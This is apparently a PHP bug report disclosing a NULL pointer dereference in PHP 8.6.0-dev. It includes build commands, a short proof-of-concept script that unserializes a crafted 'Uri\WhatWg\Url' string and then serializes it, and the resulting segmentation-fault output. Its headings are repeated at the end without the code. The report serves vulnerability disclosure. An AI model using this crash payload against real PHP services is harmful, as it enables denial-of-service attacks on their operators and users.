Description
Description
Version: PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Researcher: Igor Sak-Sakovskiy (Positive Technologies)
Language assembly and compilation.
Listing 1. Language assembly and compilation.
$ git clone https://github.com/php/php-src.git
$ cd php-src
$ ./buildconf
$ ./configure
$ make -j8
$ ./sapi/cli/php -v
PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Copyright © The PHP Group and Contributors
Zend Engine v4.6.0-dev, Copyright © Zend by Perforce
with Zend OPcache v8.6.0-dev, Copyright ©, by Zend by Perforce
The source code.
Listing 2. The source code
<?php
$payload = 'C:14:"Uri\WhatWg\Url":0:{}';
$obj = unserialize($payload); // Successful unserialization
var_dump($obj); // Object created
// Crash occurs here:
$serialized = serialize($obj); // Access violation / Segmentation fault
?>
Executing this PHP code results in Segmentation fault due to NULL pointer dereference, leading to Denial of Service (DoS).
Listing 3.
$ ./php-src/sapi/cli/php poc.php
Warning: Class Uri\WhatWg\Url has no unserializer in /home/administrator/Temp/poc.php on line 4
object(Uri\WhatWg\Url)#1 (0) {
}
Segmentation fault (core dumped)
NULL pointer dereference leads to process crash, causing Denial of Service. In ZTS mode, this can stop all currently served requests in the process.
PHP Version
PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Operating System
No response
Description
Description
Version: PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Researcher: Igor Sak-Sakovskiy (Positive Technologies)
Language assembly and compilation.
Listing 1. Language assembly and compilation.
The source code.
Listing 2. The source code
Executing this PHP code results in Segmentation fault due to NULL pointer dereference, leading to Denial of Service (DoS).
Listing 3.
NULL pointer dereference leads to process crash, causing Denial of Service. In ZTS mode, this can stop all currently served requests in the process.
PHP Version
Operating System
No response